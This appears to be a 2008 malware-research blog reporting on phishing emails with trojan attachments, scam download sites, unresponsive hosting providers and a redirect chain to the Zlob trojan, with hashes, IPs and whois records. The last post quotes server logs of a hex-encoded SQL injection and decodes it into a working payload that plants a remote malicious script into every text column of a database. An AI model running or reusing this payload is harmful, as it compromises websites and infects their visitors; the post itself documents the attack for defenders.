I'm used to getting PayPal phishing scams, thats certainly nothing new. However, I've not had one of these in a while - a PayPal infection scam. Unlike your run of the mill Phish, this doesn't include any links to third party servers (other than PayPal themselves), but instead includes an attachment (you know whats coming).

The e-mail itself is pretty straight forward, simply stating;

Dear member,
As part of our security measures, we regularly screen activity in the PayPal system.

We have reason to believe that your account was accessed by a third party. Because protecting the security of your account is our primary concern, we have limited access to sensitive PayPal account features. We understand that this may be an inconvenience but please understand that this temporary limitation is for your protection. Please review the report that we have attached to this email to see who accessed your account and contact us promptly if anything is unusual.

Case ID Number: PP-854-512-134

Thank you for your patience as we work together to protect your account.

PayPal Account Review Department
PayPal Email ID PP2310


The attachment is a 324K zip with the name account-1407A4-report.zip (MD5: 713885a1432fc4a822f9473828045952), I've no doubt that the alphanumeric part will be randomized - they usually are. Avira flagged this one as TR/Crypt.XDR.Gen, and running it through VT showed pretty bad results;

http://www.virustotal.com/analisis/a339e57900d936a58d8fa970d7de6977

... a measly 19/32 have detections for it.

Exported by: Outlook Export v0.1.2


From: security@paypal(dot)com
E-mail:security@paypal(dot)com [ 66.211.168.193 - node-66-211-168-193.networks.paypal(dot)com ]
Date: 24/09/2008 14:23:39
Subject: Your Pay Pal Account May Be Compromised
**************************************************************************
Links
**************************************************************************

Link: https://www.paypal(dot)com/us
Domain: www.paypal(dot)com
IP: 66.211.168.193 [ node-66-211-168-193.networks.paypal(dot)com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: hxxp://images.paypal(dot)com/en_US/i/scr/pixel.gif
Domain: images.paypal(dot)com
IP: 66.211.168.128 [ images.paypal(dot)com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
PayPal <https://www.paypal(dot)com/us>
src=http://images.paypal(dot)com/en_US/i/scr/pixel.gif
src=http://images.paypal(dot)com/en_US/i/scr/pixel.gif
Dear member,
As part of our security measures, we regularly screen activity in the PayPal system.

We have reason to believe that your account was accessed by a third party. Because protecting the security of your account is our primary concern, we have limited access to sensitive PayPal account features. We understand that this may be an inconvenience but please understand that this temporary limitation is for your protection. Please review the report that we have attached to this email to see who accessed your account and contact us promptly if anything is unusual.

Case ID Number: PP-854-512-134






Thank you for your patience as we work together to protect your account.

PayPal Account Review Department
PayPal Email ID PP2310


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>PayPal <<A HREF="https://www.paypal(dot)com/us">https://www.paypal(dot)com/us</A>>     <BR>
src=<A HREF="http://images.paypal(dot)com/en_US/i/scr/pixel.gif">http://images.paypal(dot)com/en_US/i/scr/pixel.gif</A>     <BR>
src=<A HREF="http://images.paypal(dot)com/en_US/i/scr/pixel.gif">http://images.paypal(dot)com/en_US/i/scr/pixel.gif</A>     <BR>
Dear member,   <BR>
As part of our security measures, we regularly screen activity in the PayPal system.<BR>
<BR>
We have reason to believe that your account was accessed by a third party. Because protecting the security of your account is our primary concern, we have limited access to sensitive PayPal account features. We understand that this may be an inconvenience but please understand that this temporary limitation is for your protection. Please review the report that we have attached to this email to see who accessed your account and contact us promptly if anything is unusual.<BR>
<BR>
Case ID Number: PP-854-512-134<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
Thank you for your patience as we work together to protect your account.<BR>
<BR>
PayPal Account Review Department       <BR>
PayPal Email ID PP2310 <BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <security@paypal(dot)com>
Delivered-To: services@[ITM]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-72.livemail.co.uk (Postfix) with SMTP id 4BB7166E6C5
for <services@[ITM]>; Wed, 24 Sep 2008 14:19:06 +0100 (BST)
Received: from paypal(dot)com (rrcs-24-123-221-42.central.biz.rr.com [24.123.221.42])
by smtp-in-72.livemail.co.uk (Postfix) with ESMTP id C661766E71A
for <hphosts@[ITM]>; Wed, 24 Sep 2008 14:18:49 +0100 (BST)
From: security@paypal(dot)com
To: hphosts@[ITM]
Subject: Your Pay Pal Account May Be Compromised
Date: Wed, 24 Sep 2008 09:23:39 -0400
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0011_AA8C3ED1.95BE0846"
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: <20080924131849.C661766E71A@smtp-in-72.livemail.co.uk>
X-Original-To: hphosts@[ITM]

Next hpHosts update

Just a note folks, the next update - aslong as nothing else goes wrong (had the mail server go down today, and my laptop is now playing silly buggers), will hopefully be out by Saturday.

Monday 22 September 2008

Exclusive photos, you'll be happy!

HA! happy if you like your computer infected with trojans (TR/Dldr.Small.ADMM to be exact) perhaps .....

http://www.virustotal.com/analisis/baccc58a407108294e1d9e245ca75273

This trojan creates a file called rs32net.exe in the %system% folder (generally C:\Windows\System for 9x, System32 for 2000 and above), and connects to the following on port 80;

216.195.56.22
208.66.195.71
208.66.195.15

... it also rather kindly, creates an entry in the registry so it runs each time the computer boots;

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rs32net

The e-mail seems to want to both insult us younger folk (heh!) and keep things as short as possible, simply stating;

Hello, old chap.

Watch my tits!

Thanks.


Ah the joys .....

Exported by: Outlook Export v0.1.2


From: Rodney Estrada
E-mail:seamus.danby@acg-wien.at [ 80.243.163.49 - www29.world4you.com ]
Date: 23/09/2008 03:24:48
Subject: Exclusive photos, you'll be happy
**************************************************************************
Links
**************************************************************************


**************************************************************************
Text Version
**************************************************************************
Hello, old chap.

Watch my tits!

Thanks.


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>Hello, old chap.<BR>
<BR>
Watch my tits!<BR>
<BR>
Thanks.<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <seamus.danby@acg-wien.at>
Delivered-To: services@[RMVD]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-165.livemail.co.uk (Postfix) with SMTP id 97ACFEB0098
for <services@[RMVD]>; Tue, 23 Sep 2008 03:24:55 +0100 (BST)
Received: from ip-154-105-net.express.net.id (ip-154-105-net.express.net.id [203.153.105.154])
by smtp-in-165.livemail.co.uk (Postfix) with ESMTP id 0272DEB0098
for <jane@[RMVD]>; Tue, 23 Sep 2008 03:24:52 +0100 (BST)
Received: from [203.153.105.154] by mail.acg-wien.at; Tue, 23 Sep 2008 10:24:48 +0800
Message-ID: <01c91d66$9aef1800$9a6999cb@seamus.danby>
From: "Rodney Estrada" <seamus.danby@acg-wien.at>
To: <jane@[RMVD]>
Subject: Exclusive photos, you'll be happy
Date: Tue, 23 Sep 2008 10:24:48 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0006_01C91D66.9AEF1800"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.71.2244.8
X-MimeOLE: Produced By Microsoft MimeOLE V4.71.2244.8
X-Original-To: jane@[RMVD]


Sunday 21 September 2008

fSpamList.com Users - There's a new support forum for you!

I've been speaking to Josh, who runs fSpamList.com, and we've setup a new support forum for those users that use his database, and may require help or such with it, along of course, with those who are listed (IP, username or e-mail) and would like to request removal.

The support forums are located at the hpHosts Support Forums, and require free registration before being allowed to post (for obvious reasons).

fSpamList Support
http://forum.hosts-file.net/viewforum.php?f=63

In addition to this, with the help of SysAdMini (MalwareDomainList), I've also modified a PHP script written by Smurf_Minions, to allow it to be used by those that would not only like to be able to check e-mail/IP/usernames against the SFS database, but would also like to check them against the fSpamList database aswell;

[CODE] Querying the fSpamList and StopForumSpam databases
http://forum.hosts-file.net/viewtopic.php?f=64&t=737

Saturday 20 September 2008

242 reasons to avoid 78.129.142.9 (RapidSwitch - AS29131)

I've got a little history with these chaps and chapesses, and it ain't good! It all started in February of this year, when I came across two scammy websites;

i-explorer.info
operasoft.info

The latter, thanks to the help of Stein Vråle and the legal/abuse folks at Opera, was shut down. The former however, is still online to date. At the time, it was peddling what they claimed was Internet Explorer 7, but like goofull.com, wanted you to send them an SMS text that surprise surprise, ended up with your paying through the nose. I did report them to RapidSwitch, for all the good it did - evidently RapidSwitch couldn't give a hoot aslong as they're getting paid.

https://myservers.rapidswitch.com/Abuse/AbuseTicket.aspx?ticketid=VDNL-GOE-KQJF&key=rrgvsfteml

i-explorer.info is now peddling what they claim is Internet Explorer Pro 2.3.6 Final , and surprise surprise, you gotta pay them. As evidenced by the following in the installers nsi.ini file;

You are using a Premium Download.\r\n\r\nTo continue you must get an activation code.



If you click to get an activation code, you are taken to (screenshot);

http://www.i-explorer.info/uk/check_code.php

Which has the lovely little disclaimer at the bottom;


You made a premium download. The server used to download this software needs that you send 3 ( total cost 6 pounds ) sms before installing on your computer. Please read Terms of Service for more info This charge is used to support the virus & spyware check team. Activating Download doesn't mean acquire a software license.


.... and nope, "Terms of Service" is not linkified - thar be nothing to click. The TOS is actually located at;

http://www.i-explorer.info/uk/condiciones.html

... and makes for interesting reading.

Surprisingly, if you go to i-explorer.info (the main homepage), you get redirected to /es and you get what actually seems to be IE 8 beta (this is also not a good thing as I'm pretty sure Microsoft don't allow distribution of their beta's), packaged in a 7zip file. I'll have to do a comparison with the official IE 8 beta from Microsoft to see if they've added/modified anything.

Alas however, this is just one of the sites on this IP, there are many others - and the theme remains the same. i-explorer.net for instance, peddles what they claim is Internet Explorer 8.0.6001.18241 Beta 2 (XP), and leads you to download;

http://www.i-explorer.net/uk/install_IE8WindowsXPx86ENU.exe.exe

Unlike i-explorer.info/es, this definately isn't the official Microsoft beta. As evident by the same thing as previously referenced, appearing in the installers nsi.ini file (the screenshot above is the same theme that appears here).

Once again, you are led to the following in order to pay them;

http://www.i-explorer.net/uk/check_code.php

... which has the same disclaimer as i-explorer.info.

To view the full list of domains running this scam (or at least, those I've got in the hpHosts database), see;

http://hosts-file.net/pest.asp?show=78.129.142.

So what of RapidSwitch? Well, I tried calling, I tried e-mailing, and eventually the RS MD called me to tell me they'd now banned my e-mail address from contacting them - which I found hillarious. His reason? I apparently registered on their system as a customer.

Er nope .... I sent an e-mail to: support@rapidswitch.com, sales@rapidswitch.com as sending it to abuse@, created duplicate tickets.

After the call, I sent them the following;

Dear Sir/Madam,
First and foremost, I would like to complain about the way in which you handle people that telephone yourselves.

Telling me you cannot deal with me over the phone is bad enough, but to also tell me you cannot give me a contact e-mail address (that will NOT result in yet another new ticket being created) over the phone is just taking the mick (which incidentally, is why I'm sending this to both of the e-mail addresses on your contact page). I've already sent an e-mail to your abuse department concerning this, and it created a duplicate ticket, which is why I was calling.

Secondly, I would like to complain about the way your company deals with complaints. I reported one of your customers running site's which are clearly illegal, and if you have such, should be against your terms of service.

Since I have not had a response on the ticket since the 11th, I decided to call this morning - to be told you would not deal with me over the phone. I've provided you with evidence of the illegal activity, and am disgusted that you have allowed the site's to stay online, and have further allowed your client not to respond.

Original:
https://myservers.rapidswitch.com/Abuse/AbuseTicket.aspx?ticketid=VDNL-GOE-KQJF&key=rrgvsfteml

Duplicate:
https://myservers.rapidswitch.com/Abuse/AbuseTicket.aspx?ticketid=QFYX-DQU-SXNT&key=dzphkivozj

If contacting the appropriate authorities is the only way to get you to deal with this, then I will be more than happy to do so. Additionally, if you allow this type of activity to occur on your network, I will also do my best
to ensure this practice is publicized.


... and their reply?

Steven,

We have a strict procedure for abuse complaints; please email abuse@rapidswitch.com

Thank you,

Regards,

Paul Tacey-Green
RapidSwitch Ltd
Tel: 020 7106 0730

RapidSwitch Ltd, Technical Building, Priors Way, Maidenhead, SL6 2HP


Woops! Seems Paul wasn't informed that;

1. My domain had been blocked (which itself begs the question of how my e-mail got through).
2. Sending an e-mail to abuse@, creates a ticket, that alas may aswell just be completely ignored, RapidSwitch themselves certainly aren't going to do anything.

Never the less, the fact these are still online, and there's been more popping up since I reported the sites to them, simply proves that RapidSwitch couldn't give a hoot - they're getting paid. Thus my personal recommendation? drop their entire range;


inetnum: 78.129.142.0 - 78.129.142.255
netname: Rapidswitch_9
descr: Rapidswitch Ltd
country: GB
admin-c: AR6363-RIPE
tech-c: AR6363-RIPE
status: ASSIGNED PA
mnt-by: RAPIDSWITCH-MNT
source: RIPE # Filtered

person: Abuse Robot
address: RapidSwitch Ltd
address: Technical Building
address: Priors Way
address: Maidenhead
address: SL6 2HP
phone: +44 (0)20 7106 0730
remarks: ******************************************************
remarks: * ABUSE REPORTS *
remarks: * E-mail: abuse@rapidswitch.com *
remarks: * https://myservers.rapidswitch.com/reportabuse.aspx *
remarks: * IMPORTANT: We are unable to accept abuse reports *
remarks: * any other way except the two methods listed above. *
remarks: ******************************************************
e-mail: abuse@rapidswitch.com
nic-hdl: AR6363-RIPE
mnt-by: RAPIDSWITCH-MNT
source: RIPE # Filtered

% Information related to '78.129.128.0/17AS29131'

route: 78.129.128.0/17
descr: RapidSwitch Ltd
origin: AS29131
mnt-by: RAPIDSWITCH-MNT
source: RIPE # Filtered

Friday 19 September 2008

cr4nk.ws has gone!

It would seem, the folks at DirectI/Logicboxes, have taken the initiative and actually taken notice of the report I sent them as the WhoIs for cr4nk.ws, is now showing as suspended.

Domain Name: CR4NK.WS

Registrar Name: Directi Internet Solutions Pvt. Ltd. DBA PublicDomainRegistry.com
Registrar Email: tldadmin@logicboxes.com
Registrar Telephone: 832-295-1535
Registrar Whois: whois.publicdomainregistry.com

Registrant Name: See registrar info above
Registrant Email: See registrar info above

Administrative Contact Email: See registrar info above
Administrative Contact Telephone: See registrar info above

Domain Created: 2008-02-16
Domain Last Updated: 2008-09-19
Domain Currently Expires: 2009-02-16

Current Nameservers:

ns1.suspended-domain.com
ns2.suspended-domain.com


WhoIs server: whois.website.ws


References:

cr4nk.ws has moved to Hostfresh
http://hphosts.blogspot.com/2008/09/cr4nkws-has-moved-to-hostfresh.html

cr4nk.ws has moved to Hostfresh

Alas, they're still with DirectI however and they're still actively trying to exploit my servers (amongst other people's of course), so I've fired off another abuse report (perhaps DirectI will actually shut them down this time?).

The new IP for cr4nk.ws is 116.50.15.114 (Hostfresh - AS23898), with the old IP address being 67.225.157.104, the latter of which of course, is Liquid Web (AS32244).

inetnum: 116.50.8.0 - 116.50.15.255
netname: HOSTFRESH
descr: HostFresh
descr: Internet Service Provider
country: HK
admin-c: PL466-AP
tech-c: PL466-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
mnt-lower: MAINT-HK-HOSTFRESH
mnt-routes: MAINT-HK-HOSTFRESH
remarks: Please send Spam & Abuse report to
remarks: abuse@hostfresh.com
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: hm-changed@apnic.net 20070307
source: APNIC

person: Piu Lo
nic-hdl: PL466-AP
e-mail: ipadmin@hostfresh.com
address: No. 500, Post Office, Tuen Mun, N.T., Hong Kong
phone: +852-35979788
fax-no: +852-24522539
country: HK
changed: ipadmin@hostfresh.com 20071025
mnt-by: MAINT-HK-HOSTFRESH
source: APNIC


References:

cr4nk.ws again - another Directi, LogicBoxes, LiquidWeb exploit gang
http://hphosts.blogspot.com/2008/09/cr4nkws-again-another-directi.html

hpHosts Online - cr4nk.ws
http://hosts-file.net/?s=cr4nk.ws

Report Slams U.S. Host as Major Source of Badware - Security Fix
http://voices.washingtonpost.com/securityfix/2008/08/report_slams_us_host_as_major.html

Spamhaus Blog - Cybercrime's U.S. Home
http://www.spamhaus.org/news.lasso?article=636

Thursday 18 September 2008

AARP Site "Hack", more than just porn promotion

There's slightly more to it than just spam for promotion of porn pages via Google. Looking through the code, shows multiple redirections via 301 then 302, which eventually leads to a Cernel hosted site that will infect the unsuspecting user with the Zlob trojan;

Start here;
http://vurl.mysteryfcm.co.uk/?url=http://www.aarp.org/community/c1w2y8&selUAStr=1&cbxLinks=&cbxSource=on&cbxBlacklist=on&selServer=4&ref=

/Begin edit 22-09-08 00:58

A check a few seconds ago, shows the aarp profile no longer exists. Alas there doesn't seem to be a cache of it either ....

/-End edit 22-09-08 00:58

Next, it leads you to;

http://vurl.mysteryfcm.co.uk/?url=http://plzwait.info/in.cgi?2¶meter=teen+galleries&ur=1&HTTP_REFERER=http://www.aarp.org/community/c1w2y8&selUAStr=1&cbxLinks=&cbxSource=on&cbxBlacklist=on&selServer=3&ref=http://www.aarp.org/community/c1w2y8

If you look at the headers (displayed just above the source code), you'll notice the 301 via joyfulclipz.com followed by the 302 via breeddirect.com.

The final result, is the Zlob trojan (12K UPX, 32K unpacked (Visual C++ 6 file) - setup.exe), courtesy of movsdevices.com, as shown in the source at the following.



http://vurl.mysteryfcm.co.uk/?url=http://plzwait.info/st/st.php?cat=63&script=1&url=http://www.wootmovs.com/m4/index.php?id=1117&n=teen&a=fireplace&v=2133734&preview=http://img2.joyfulclipz.com/st/thumbs/010/7598829497.jpg&p=100&selUAStr=1&cbxLinks=&cbxSource=on&cbxBlacklist=on&selServer=3&ref=http://plzwait.info/in.cgi?2¶meter=teen%20galleries&ur=1&HTTP_REFERER=http://www.aarp.org/community/c1w2y8

Detection for the file, packed and unpacked, is rubbish :o(

Packed (5/36)
http://www.virustotal.com/analisis/a65ca4aea5af13882b9e3c340a419922

Unpacked (1/36)
http://www.virustotal.com/analisis/9f242182ca38a09c4e050043e22b5b76

Alas I'm in the process of fixing my laptop at the moment, so I'll leave the detailed analysis of the executable to someone else.

Sites involved:

breeddirect.com (78.157.143.200)
joyfulclipz.com (78.108.177.124)
img2.joyfulclipz.com (78.108.177.124, also valid as img1-4.)
wootmovs.com (78.157.143.133)
movsdevices.com (77.91.231.201)

References:

AARP Site Hacked and Spammed
http://www.mxlogic.com/itsecurityblog/1/2008/09/AARP-Site-Hacked-and-Spammed.cfm

Porn Operators Hijack Pages on AARP Website
http://www.darkreading.com/document.asp?doc_id=164115&f_src=darkreading_section_296

Knew I'd find the original reference that led me to this ;o)

Porn Operators Hijack Pages on AARP Website
http://temerc.com/forums/viewtopic.php?f=4&t=5780

Penguin Panic!

Thar be a new infected e-mail floating round folks. This one comes with a variety of subjects, and so far, a single zip - penguin.panic.zip, which of course, contains an executable (14K) of the same name.

http://www.virustotal.com/analisis/120fb641310e4704565ef683ca33b2d0

The executable does contain a little string that seems to lay claim to it's origins being those of "Botnet Jack";



Subjects I've seen thus far;

Take a break!
Apple: The most popular game!
iPhone's most popular game!
Apple presents iPhone games!
Play iPhone on your PC today.

Content of the e-mails that I've seen thus far include;

Beet my score! (7000 points)!
Steve Jobs presents iPhone!
Take a break!
Famous iPhone games!
iPhone's most popular game!

Needless to say folks, if you receive this, delete it!

References:

hi, botnet Jack here
http://blogs.law.harvard.edu/zeroday/2008/09/18/hi-botnet-jack-here/

Sporadic e-mail issues

Alas I must've annoyed someone at FastHosts hehe*

Over the past few days, I've noticed a sporadic issue with my being able to connect to my incoming mail server, meaning I can only occasionally, receive it. I've already spoken to my host, and they're going to get in touch with FastHosts about it. In the meantime however, if I don't respond to your e-mail straight away, please be patient - it's not my fault!

* Poor attempt at a joke

Tuesday 16 September 2008

EstDomains now allowing WhoIs queries

I was investigating hiskyhost.net (AS43355), due to the fact I've now got 48 domains going through them, that are associated with malware. More interestingly, they all resolve to housing.hiskyhost.net - a hostname that does not itself, actually resolve to an IP;

http://hosts-file.net/?s=housing.hiskyhost.net

During the course of the investigation, I decided to do a WhoIs query, and prior to my trying today, EstDomains have never allowed WhoIs queries, instead opting to either refuse access to their WhoIs server, or as is the case with whois.internet.bs, return complete rubbish (i.e. when querying whois.internet.bs, their WhoIs server will return "D D"). In October 2007, I noticed their server consistently returning the following, irrespective of the domain being queried;

WhoIs Information:

Referred to: whois.estdomains.com
By: whois.internic.net

An I/O error occured while sending to the backend.

WhoIs server: whois.estdomains.com


Having done a WhoIs query via the EstDomains website, I decided to try modifying the hpHosts site to do the query directly against their WhoIs server - and what did it return? Surprisingly, it returned the same data as their web interface - something it had never done before;

WhoIs Information:

Referred to: whois.estdomains.com
By: whois.crsnic.net

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: http://www.estdomains.com

Domain Name: HISKYHOST.NET

Registrant:
High Sky Hosting
Alexey Vorobiev (admin@hiskyhost.net)
ul Oleko Dundicha 5
S Petersburg
null,192283
RU
Tel. +7.9214598211

Creation Date: 29-Jan-2008
Expiration Date: 29-Jan-2009

Domain servers in listed order:
ns2.hiskyhost.net
ns1.hiskyhost.net


Administrative Contact:
High Sky Hosting
Alexey Vorobiev (admin@hiskyhost.net)
ul Oleko Dundicha 5
S Petersburg
null,192283
RU
Tel. +7.9214598211

Technical Contact:
High Sky Hosting
Alexey Vorobiev (admin@hiskyhost.net)
ul Oleko Dundicha 5
S Petersburg
null,192283
RU
Tel. +7.9214598211

Billing Contact:
High Sky Hosting
Alexey Vorobiev (admin@hiskyhost.net)
ul Oleko Dundicha 5
S Petersburg
null,192283
RU
Tel. +7.9214598211

Status:ACTIVE


What I am rather interested in however, is their possible connection to hiskyhost.net, 2checkout.com and internet.bs.

As a side note, I've also noticed some of those that previously resolved to housing.hiskyhost.net (e.g. mcdirecting.com), though still going through EstDomains, now resolving to the VDHost Ltd/Ultranet (AS35057) netblock;

http://hosts-file.net/?s=78.157.143.133&sDM=1#matches

This also of course, begs the question of whether there is any relation between these, to EstDomains aswell? Or whether it's just me being overly suspicious. Either way, EstDomains, if they are serious about taking malicious domains offline (and I doubt they are - more likely they're just doing it until they're out of the headlines so to speak), then they need to take both those on VDHost/Ultranet, and those on HiskyHost, offline - as shown by the following, someone's already disabled some of them;

http://hosts-file.net/misc/Hiskyhost_-_VDHost_-_EstDomains.html

In the meantime, hopefully they'll continue to allow access to their WhoIs server, and not "accidentally" disable it??? Time will tell.

Monday 15 September 2008

Injection via Hex encoded SQL

I'm not surprised when I see injection attempts against my servers anymore, but I am surprised that they're still going with the same domain. The domain that they've used in this particular attack, is one that I saw a couple months or so ago (though I'm not surprised that the domain is still online, due to where it's hosted).

The entry in my server log for this one is;

Attacker: 116.232.98.101

2008-09-15 22:30:52 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 116.232.98.101 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - mysteryfcm.co.uk 200 0 0
2008-09-15 22:30:55 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 116.232.98.101 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - mysteryfcm.co.uk 200 0 0
2008-09-15 22:31:51 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 116.232.98.101 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - mysteryfcm.co.uk 200 0 0
2008-09-15 22:31:51 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 116.232.98.101 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - mysteryfcm.co.uk 200 0 0


The hex we're interested in, is the part that begins with 0x, and ends with F72 (look just before %20AS%20CHAR since %20 is just the space character). If we decode the hex, we end up with;

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor


This tells us that it is an SQL exploit that injects the script from www0.douhunqn.cn. What does this script contain? The following of course;

